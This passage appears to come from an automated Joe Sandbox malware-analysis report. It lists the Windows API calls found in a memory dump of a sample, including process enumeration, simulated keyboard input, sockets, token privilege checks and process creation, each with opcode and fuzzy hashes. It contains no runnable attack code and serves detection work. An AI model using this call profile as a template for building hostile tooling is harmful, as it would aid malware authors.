• Opcode ID: e0f95aa9230d5692667c7cf581a94bc4ab2d0019c86a53e41d0a6c4a23108004
• Instruction ID: 6df3ae648e7cd150e2a61a82750624e9e74eba3b2d455515f9cb2fa0d6782921
• Opcode Fuzzy Hash: e0f95aa9230d5692667c7cf581a94bc4ab2d0019c86a53e41d0a6c4a23108004
• Instruction Fuzzy Hash: C0810775A00109EFCF04DF94C984EEEB7B9EF89315F244599E506BB260DB71AE06CB60
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: 5f9a117c3887417ec703b03946732ea513104ae6c1afb9ec44bbe9b0ddc2b0a7
• Instruction ID: 42dbb5a48cff266898ffaba00000fa2a8fd592fd53e58e35ad4f6653183c4ceb
• Opcode Fuzzy Hash: 5f9a117c3887417ec703b03946732ea513104ae6c1afb9ec44bbe9b0ddc2b0a7
• Instruction Fuzzy Hash: 0F51C6306287019BCF209F799895B6EB3E4AF45314F24B81FE5D6F72A2EA3098488705
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00EBF526
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00EBF534
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00EBF5F4
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EBF603
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
APIs
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E9A68A
• __itow.LIBCMT ref: 00E9A6BB
  • Part of subcall function 00E9A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E9A976
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E9A724
• __itow.LIBCMT ref: 00E9A77B
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00EB70BC
• WSAGetLastError.WSOCK32(00000000), ref: 00EB70CC
  • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
  • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EB7130
• WSAGetLastError.WSOCK32(00000000), ref: 00EB713C
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00ED0980), ref: 00EB6B92
• _strlen.LIBCMT ref: 00EB6BC4
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EC8F03
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• ClientToScreen.USER32(?,?), ref: 00ECB1D2
• GetWindowRect.USER32(?,?), ref: 00ECB248
• PtInRect.USER32(?,?,00ECC6BC), ref: 00ECB258
• MessageBeep.USER32(00000000), ref: 00ECB2C9
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EA1326
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00EA1342
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00EA13A8
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00EA13FA
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00EA1465
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00EA1481
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00EA14E0
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00EA1532
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E7642B
• __isleadbyte_l.LIBCMT ref: 00E76459
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E76487
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E764BD
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3058430110-0
                                                                                                          • Opcode ID: f95af10d7a0dae8bca1245232107b49ac57a23383e5664f36b0d0d5dc4671c23
                                                                                                          • Instruction ID: 9367e6edb3534ad5c1299a61fcb799401880ed8bee0784d0e8e33c71d04f7dbc
                                                                                                          • Opcode Fuzzy Hash: f95af10d7a0dae8bca1245232107b49ac57a23383e5664f36b0d0d5dc4671c23
                                                                                                          • Instruction Fuzzy Hash: 3231D031600A56AFDB258F75CC44BAA7BB9FF40328F159069E838A7191EB31E850DB50
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 00EC553F
                                                                                                            • Part of subcall function 00EA3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EA3B4E
                                                                                                            • Part of subcall function 00EA3B34: GetCurrentThreadId.KERNEL32 ref: 00EA3B55
                                                                                                            • Part of subcall function 00EA3B34: AttachThreadInput.USER32(00000000,?,00EA55C0), ref: 00EA3B5C
                                                                                                          • GetCaretPos.USER32(?), ref: 00EC5550
                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00EC558B
                                                                                                          • GetForegroundWindow.USER32 ref: 00EC5591
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2759813231-0
                                                                                                          • Opcode ID: b960259f0e305b4e7ae1cc49cad2dd223107d520540ef3caf82547e3fd2cf3a9
                                                                                                          • Instruction ID: 937fc506c9df3c749c98c75f1d4147bfb8beb86db848cc17815f6dc04672b923
                                                                                                          • Opcode Fuzzy Hash: b960259f0e305b4e7ae1cc49cad2dd223107d520540ef3caf82547e3fd2cf3a9
                                                                                                          • Instruction Fuzzy Hash: 79311CB1A01108AFDB00EFA5D985EEEB7F9EF58304F10506AE815F7241DA71AE458BA0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • GetCursorPos.USER32(?), ref: 00ECCB7A
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E7BCEC,?,?,?,?,?), ref: 00ECCB8F
                                                                                                          • GetCursorPos.USER32(?), ref: 00ECCBDC
                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E7BCEC,?,?,?), ref: 00ECCC16
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2864067406-0
                                                                                                          • Opcode ID: e8b6538c27b70a21b62462918670f95928fed5568e915ad764bfe50e72859069
                                                                                                          • Instruction ID: 589d7a502691d115e9b8575c67e08cd0821fec4b45f12e07916552c3b1e06bac
                                                                                                          • Opcode Fuzzy Hash: e8b6538c27b70a21b62462918670f95928fed5568e915ad764bfe50e72859069
                                                                                                          • Instruction Fuzzy Hash: 1B31E134600158AFCB259F95D849FFA7BF5FB49310F244499F909AB261C3326D52EFA0
                                                                                                          APIs
                                                                                                          • __setmode.LIBCMT ref: 00E60BE2
                                                                                                            • Part of subcall function 00E5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EA7E51,?,?,00000000), ref: 00E54041
                                                                                                            • Part of subcall function 00E5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EA7E51,?,?,00000000,?,?), ref: 00E54065
                                                                                                          • _fprintf.LIBCMT ref: 00E60C19
                                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 00E9694C
                                                                                                            • Part of subcall function 00E64CCA: _flsall.LIBCMT ref: 00E64CE3
                                                                                                          • __setmode.LIBCMT ref: 00E60C4E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 521402451-0
                                                                                                          • Opcode ID: 81b1e3ef075545898108815d59c746299f474f66c1f55b8784bd9391e2d6c298
                                                                                                          • Instruction ID: c0878158c96234e419951b737e199236a52b2abf7e8ed7062e0ae34e298b8da4
                                                                                                          • Opcode Fuzzy Hash: 81b1e3ef075545898108815d59c746299f474f66c1f55b8784bd9391e2d6c298
                                                                                                          • Instruction Fuzzy Hash: E3115BB19441147EC709B7A4BC42ABEB79CDF41361F14215AF204762C2DF211C5697A1
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E98D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E98D3F
                                                                                                            • Part of subcall function 00E98D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D49
                                                                                                            • Part of subcall function 00E98D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D58
                                                                                                            • Part of subcall function 00E98D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D5F
                                                                                                            • Part of subcall function 00E98D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D75
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E992C1
                                                                                                          • _memcmp.LIBCMT ref: 00E992E4
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E9931A
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E99321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1592001646-0
                                                                                                          • Opcode ID: dda7719a7f834700b1c5051ededcca7ac544c4b62f8ce05a4e2ab172886ee4d3
                                                                                                          • Instruction ID: 67154613cec974e5aa02cffe5778cda3e6f17ae4d6afdf1295eacdb7bc45456f
                                                                                                          • Opcode Fuzzy Hash: dda7719a7f834700b1c5051ededcca7ac544c4b62f8ce05a4e2ab172886ee4d3
                                                                                                          • Instruction Fuzzy Hash: 8B218C31E41208EFDF20DFA8D945BEEB7B8EF44305F085059E844B7291D770AA04CBA0
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00EC63BD
                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC63D7
                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC63E5
                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EC63F3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                          • String ID:
                                                                                                          • API String ID: 2169480361-0
                                                                                                          • Opcode ID: 76ea1acd534826cefb8595bcd6e56e3a0ef85671cde08de0912446d7bc818115
                                                                                                          • Instruction ID: bdd7b2d6749747e04dd6432d9e43648a79630a1670d6cf9848851c9c46696bcf
                                                                                                          • Opcode Fuzzy Hash: 76ea1acd534826cefb8595bcd6e56e3a0ef85671cde08de0912446d7bc818115
                                                                                                          • Instruction Fuzzy Hash: 81110331305414AFD704AB28EC44FBB7799EF85320F18521DF816EB2D2CB61AC01CB95
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E9F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E9E46F,?,?,?,00E9F262,00000000,000000EF,00000119,?,?), ref: 00E9F867
                                                                                                            • Part of subcall function 00E9F858: lstrcpyW.KERNEL32(00000000,?,?,00E9E46F,?,?,?,00E9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E9F88D
                                                                                                            • Part of subcall function 00E9F858: lstrcmpiW.KERNEL32(00000000,?,00E9E46F,?,?,?,00E9F262,00000000,000000EF,00000119,?,?), ref: 00E9F8BE
                                                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E9E488
                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,00E9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E9E4AE
                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E9E4E2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                          • String ID: cdecl
                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                          • Opcode ID: d08ed3441aff10de9537b08b5841e0fb84097a167d924e13453bc375a191e071
                                                                                                          • Instruction ID: 447ffdaab86ca396b7fb9654e1a63aff723835c091715ff0c76465ba2c0af543
                                                                                                          • Opcode Fuzzy Hash: d08ed3441aff10de9537b08b5841e0fb84097a167d924e13453bc375a191e071
                                                                                                          • Instruction Fuzzy Hash: 0C11D07A200345AFCF25EF24EC45E7E77A8FF45354B44502AF90ADB2A0EB319951C791
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 00E75331
                                                                                                            • Part of subcall function 00E6593C: __FF_MSGBANNER.LIBCMT ref: 00E65953
                                                                                                            • Part of subcall function 00E6593C: __NMSG_WRITE.LIBCMT ref: 00E6595A
                                                                                                            • Part of subcall function 00E6593C: RtlAllocateHeap.NTDLL(010B0000,00000000,00000001,?,00000004,?,?,00E61003,?), ref: 00E6597F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 614378929-0
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EA4385
• _memset.LIBCMT ref: 00EA43A6
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EA43F8
• CloseHandle.KERNEL32(00000000), ref: 00EA4401
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
APIs
  • Part of subcall function 00E5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EA7E51,?,?,00000000), ref: 00E54041
  • Part of subcall function 00E5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EA7E51,?,?,00000000,?,?), ref: 00E54065
• gethostbyname.WSOCK32(?,?,?), ref: 00EB6A84
• WSAGetLastError.WSOCK32(00000000), ref: 00EB6A8F
• _memmove.LIBCMT ref: 00EB6ABC
• inet_ntoa.WSOCK32(?), ref: 00EB6AC7
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00E99719
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E9972B
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E99741
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E9975C
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
  • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
• DefDlgProcW.USER32(?,00000020,?), ref: 00E416B4
• GetClientRect.USER32(?,?), ref: 00E7B93C
• GetCursorPos.USER32(?), ref: 00E7B946
• ScreenToClient.USER32(?,?), ref: 00E7B951
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E4214F
• GetStockObject.GDI32(00000011), ref: 00E42163
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4216D
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EA04EC,?,00EA153F,?,00008000), ref: 00EA195E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EA04EC,?,00EA153F,?,00008000), ref: 00EA1983
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EA04EC,?,00EA153F,?,00008000), ref: 00EA198D
• Sleep.KERNEL32(?,?,?,?,?,?,?,00EA04EC,?,00EA153F,?,00008000), ref: 00EA19C0
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00ECE1EA
• LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00ECE201
• RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00ECE216
• RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00ECE234
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
APIs
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
APIs
• GetWindowRect.USER32(?,?), ref: 00ECB956
• ScreenToClient.USER32(?,?), ref: 00ECB96E
• ScreenToClient.USER32(?,?), ref: 00ECB992
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ECB9AD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 357397906-0
                                                                                                          • Opcode ID: bb46dfd935b0713a6faa5cb363b3789fdb6dc2af0445ca29cfeb593c8ce030fa
                                                                                                          • Instruction ID: 069a27fd507e8b0337eff304e16a2b1b1dfc1208cdbdd7a1cdeb2b6e43189085
                                                                                                          • Opcode Fuzzy Hash: bb46dfd935b0713a6faa5cb363b3789fdb6dc2af0445ca29cfeb593c8ce030fa
                                                                                                          • Instruction Fuzzy Hash: 151174B9D00209EFDB41CF99D984AEEBBF9FF48310F104156E925E3610D731AA658F50
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00ECBCB6
                                                                                                          • _memset.LIBCMT ref: 00ECBCC5
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F08F20,00F08F64), ref: 00ECBCF4
                                                                                                          • CloseHandle.KERNEL32 ref: 00ECBD06
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 3277943733-0
                                                                                                          • Opcode ID: b2bb2f708e4505cf9864418f270617af0311c5c9beed0f8ac2681ec6a66c9f02
                                                                                                          • Instruction ID: 67c0dccaec34a275f87c1ac6574b18483d1cbf34d9f184d74d5656ecc0269fbf
                                                                                                          • Opcode Fuzzy Hash: b2bb2f708e4505cf9864418f270617af0311c5c9beed0f8ac2681ec6a66c9f02
                                                                                                          • Instruction Fuzzy Hash: 44F089B15403057FE35027717C09FB73B5DEB08796F041421BA48E5192DF714C11A7A8
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00EA71A1
                                                                                                            • Part of subcall function 00EA7C7F: _memset.LIBCMT ref: 00EA7CB4
                                                                                                          • _memmove.LIBCMT ref: 00EA71C4
                                                                                                          • _memset.LIBCMT ref: 00EA71D1
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00EA71E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
